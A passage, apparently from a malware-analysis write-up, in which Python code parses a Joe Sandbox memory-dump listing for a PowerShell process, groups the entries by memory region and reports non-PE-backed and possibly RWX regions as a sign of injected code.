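Opcode Fuzzy Hash: c8f65ea284e13277991a5cecdadcdf759ce008c3c3e3c0d61cc6b59686eb43c2
Instruction Fuzzy Hash: C0D0177B7194245B82149A9EFA4486AF79EDBC9A3531880BBE90DC7340DA62EC13C6D0
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
Opcode ID: 0fc440e6dc4ea68af5da1c331651d43fb856d9e94986db2f692b05b856b57fa9
Instruction ID: f2ea5788597c2c124081a12a1239e7dbeb67a4a610b4d8d749a7ac20841450ff
Instruction Fuzzy Hash: 2CE0DFB5A0020ACBCB10DF94F9416EE73B1EBC1305F104429D109A3640DB34BE018F92
Uniqueness Score: -1.00%
Memory Dump Source
Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
Opcode ID: b2319bda78adcb53fe3a65834c0efdd37bd20136876f79781039a36f92270fba
Instruction ID: 1e027ee4b30158881ba3c12fd4bb194d28cdff87a9dc3c6e456a1dd6776b7111
Instruction Fuzzy Hash: D2E02E3270C008CBEB085B2CB89A2BEB33AF7C5716F004026E027C1482CB388A028B90
Uniqueness Score: -1.00%
"""

PAGE_EXECUTE_READWRITE = 0x40  # Win32 page-protection constant

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<dump>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<f7>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$"
)

FIELD_RES = {
    "source": re.compile(r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)"),
    "snapshot": re.compile(r"Snapshot File:\s*(\S+)"),
    "opcode_id": re.compile(r"Opcode ID:\s*([0-9a-f]{64})"),
    "instruction_id": re.compile(r"Instruction ID:\s*([0-9a-f]{64})"),
    "ifh": re.compile(r"Instruction Fuzzy Hash:\s*([0-9A-F]+)"),
    "uniq": re.compile(r"Uniqueness Score:\s*(-?[\d.]+)%"),
}


@dataclass(frozen=True)
class FunctionEntry:
    source_file: str
    offset: int
    based_on_pe: bool
    snapshot_file: str
    opcode_id: str
    instruction_id: str
    instruction_fuzzy_hash: str
    uniqueness_score: float


def parse_sdmp_name(name: str) -> dict:
    """Split a .sdmp name into fields. Fields 1 (process index) and 4 (base)
    are confirmed by the snapshot name; field 5 as protection is an ASSUMPTION."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    return {
        "process_index": int(m["proc"], 16),
        "dump_type": int(m["dump"], 16),
        "sequence": int(m["seq"]),
        "base": int(m["base"], 16),
        "protect": int(m["protect"], 16),          # assumption, see docstring
        "raw_fields": (m["f6"], m["f7"], m["f8"]),  # undefined on the page; kept raw
    }


def parse_listing(text: str) -> list[FunctionEntry]:
    """One FunctionEntry per 'Memory Dump Source' block; incomplete blocks are skipped."""
    entries = []
    for chunk in text.split("Memory Dump Source")[1:]:
        found = {k: rx.search(chunk) for k, rx in FIELD_RES.items()}
        if not all(found.values()):
            continue
        src, off, pe = found["source"].groups()
        entries.append(FunctionEntry(
            source_file=src, offset=int(off, 16), based_on_pe=(pe == "true"),
            snapshot_file=found["snapshot"].group(1),
            opcode_id=found["opcode_id"].group(1),
            instruction_id=found["instruction_id"].group(1),
            instruction_fuzzy_hash=found["ifh"].group(1),
            uniqueness_score=float(found["uniq"].group(1)),
        ))
    return entries


def snapshot_matches(entry: FunctionEntry) -> bool:
    """Check that the snapshot name repeats the .sdmp's process index, dump type
    and base, and that the listed Offset equals that base."""
    p = parse_sdmp_name(entry.source_file)
    expected = f"hcaresult_{p['process_index']}_{p['dump_type']}_{p['base']:x}_"
    return entry.snapshot_file.startswith(expected) and entry.offset == p["base"]


def group_by_region(entries: list[FunctionEntry]) -> dict[int, list[FunctionEntry]]:
    regions = defaultdict(list)
    for e in entries:
        regions[parse_sdmp_name(e.source_file)["base"]].append(e)
    return dict(regions)


def summarize(entries: list[FunctionEntry]) -> dict[int, dict]:
    """Per region: distinct functions, whether any is PE-backed, and the RWX flag
    (RWX derives from the assumed protection field)."""
    out = {}
    for base, group in group_by_region(entries).items():
        out[base] = {
            "functions": len({e.opcode_id for e in group}),
            "pe_backed": any(e.based_on_pe for e in group),
            "rwx": parse_sdmp_name(group[0].source_file)["protect"] == PAGE_EXECUTE_READWRITE,
        }
    return out


if __name__ == "__main__":
    for base, info in sorted(summarize(parse_listing(SAMPLE_LISTING)).items()):
        print(f"0x{base:08X}: {info}")
```

Feeding the whole listing through `parse_listing` collapses hundreds of blocks into a two-line summary (functions per region, none PE-backed), which is the fact worth carrying into a report: code executing from private, non-image memory of the PowerShell process. Treat the RWX column with the caveat stated above, since it depends on the assumed meaning of the fifth field.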